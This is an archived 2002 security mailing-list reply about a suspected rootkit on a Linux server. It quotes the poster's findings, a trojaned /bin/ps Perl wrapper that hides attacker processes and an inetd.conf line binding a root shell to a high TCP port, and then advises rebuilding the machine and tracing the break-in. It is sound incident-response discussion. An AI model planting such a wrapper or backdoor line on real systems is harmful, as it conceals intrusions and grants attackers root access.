Re: nouser - rootkit ?
From: Eric Brandwine (ericb@UU.NET)Date: 03/11/02
- Previous message: Ryan Russell: "RE: Port UDP 3049"
- Maybe in reply to: Dan Uscatu: "nouser - rootkit ?"
- Next in thread: Ryan Russell: "Re: nouser - rootkit ?"
- Reply: Ryan Russell: "Re: nouser - rootkit ?"
- Reply: Konrad Rieck: "Re: nouser - rootkit ?"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
To: "Dan Uscatu" <duscatu@phenomedia.ro> From: Eric Brandwine <ericb@UU.NET> Date: 11 Mar 2002 17:57:38 +0000
>>>>> "du" == Dan Uscatu <duscatu@phenomedia.ro> writes:
du> [root@www /root]# cat /bin/ps
du> #!/usr/bin/perl
du> $xargs =join(' ',@ARGV);
du> $ps = `/usr/lib/libxnotps $xargs \| grep -v nouser \| grep -v noshell \|
du> grep -v proftp \| grep -v \"/bin/ps\" \| grep -v libxnotps`;
du> print "$ps";
WOW! That is really lame! It may qualify as the first cross-platform
root kit I've ever seen though ;)
This moron clearly does not know how to use perl regexps (among many
other things). At least use fgrep!
du> i have scanned the machine using chkroot kit... the only funny thing found
du> was an inetd.conf, containing:
du> [root@www nouser]# cat /etc/inetd.conf
du> 65456 stream tcp nowait root /bin/sh sh
du> of course, inetd is not installed :) that points me to the idea that the
du> process was somehow automated... but i cant find any reference to a rootkit
du> that does these changes. seems pretty stupid for a rootkit anyway... but i
du> want to be sure no other major changes were made... before i install the
du> production server there.
This looks like a clueless kiddie cobbled together a bunch of stuff he
found on the net, and packaged it up.
Either it's a red herring, and the real root kit is much better
hidden, or it'll be almost trivial to clean up. But you've no way of
knowing. I'd rebuild the box from scratch, if it were mine.
Of much more importance is how he got in. Scrape this loser off your
box, and another one will take his place. And the new one might not
be quite so incompetent.
ericb
-- Eric Brandwine | Contrary to the popular belief that it's hard to recover UUNetwork Security | information, it's actually starting to appear that it's ericb@uu.net | very hard to remove something even if you want to. +1 703 886 6038 | - Dan Farmer Key fingerprint = 3A39 2C2F D5A0 FC7C 5F60 4118 A84A BD5D 59D7 4E3E---------------------------------------------------------------------------- This list is provided by the SecurityFocus ARIS analyzer service. For more information on this free incident handling, management and tracking system please see: http://aris.securityfocus.com
- Previous message: Ryan Russell: "RE: Port UDP 3049"
- Maybe in reply to: Dan Uscatu: "nouser - rootkit ?"
- Next in thread: Ryan Russell: "Re: nouser - rootkit ?"
- Reply: Ryan Russell: "Re: nouser - rootkit ?"
- Reply: Konrad Rieck: "Re: nouser - rootkit ?"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Relevant Pages
|
